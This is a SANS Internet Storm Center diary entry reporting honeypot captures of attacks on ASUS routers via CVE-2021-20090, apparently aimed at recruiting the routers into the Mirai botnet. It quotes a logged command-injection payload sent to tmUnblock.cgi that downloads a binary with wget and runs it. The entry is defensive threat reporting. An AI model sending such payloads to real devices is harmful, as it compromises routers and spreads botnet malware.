Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: SANS Internet Storm Center SANS Internet Storm Center

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Searching for Exposed ASUS Routers Vulnerable to CVE-2021-20090

Published: 2021-11-26
Last Updated: 2021-11-26 13:59:21 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

Over the past 7 days, my honeypot captured a few hundred POST for a vulnerability which appeared to be tracked as a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware. If successfully exploited, could allow unauthenticated remote actors to bypass authentication and add the router to the botnet Mirai botnet.

20211125-135312: data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//;chmod 777 *;./mpsl selfrep.asus

20211126-090429: data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//;chmod 777 *;./mpsl selfrep.asus

Indicators Top 10 IPs

URL Indicators





Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

YARA's Private Strings
Nov 25th 2021
1 day ago by DidierStevens (0 comments)

Phishing page hiding itself using dynamically adjusted IP-based allow list
Nov 24th 2021
2 days ago by Jan (0 comments)

YARA Rule for OOXML Maldocs: Less False Positives
Nov 23rd 2021
3 days ago by DidierStevens (0 comments)

Simple YARA Rules for Office Maldocs
Nov 22nd 2021
4 days ago by DidierStevens (0 comments)

Backdooring PAM
Nov 21st 2021
5 days ago by DidierStevens (0 comments)

Hikvision Security Cameras Potentially Exposed to Remote Code Execution
Nov 20th 2021
6 days ago by Guy (0 comments)

View All Diaries →

Latest Discussions

Dshield Sensor
created Jun 8th 2021
5 months ago by Rick (0 replies)

API port data
created Apr 25th 2021
7 months ago by JJ (1 reply)

RSS feed containing non-XML compatible characters
created Apr 14th 2021
7 months ago by Anonymous (1 reply)

Handler's Diary (Full text) RSS Feeds stopt working due to a typo
created Mar 5th 2021
8 months ago by (0 replies)

port_scan issue in Snort3
created Feb 23rd 2021
9 months ago by astraea (0 replies)

View All Forums →

Latest News

Top Diaries

Shadow IT Makes People More Vulnerable to Phishing
Nov 10th 2021
2 weeks ago by Xme (0 comments)

"Summer of SAM": Microsoft Releases Guidance for CVE-2021-36934
Jul 22nd 2021
4 months ago by Johannes (0 comments)

Securing and Optimizing Networks: Using pfSense Traffic Shaper Limiters to Combat Bufferbloat
Jul 12th 2021
4 months ago by Johannes (0 comments)

DIY CD/DVD Destruction - Follow Up
Jul 4th 2021
4 months ago by DidierStevens (0 comments)

Downloader Disguised as Excel Add-In (XLL)
Nov 19th 2021
1 week ago by Xme (0 comments)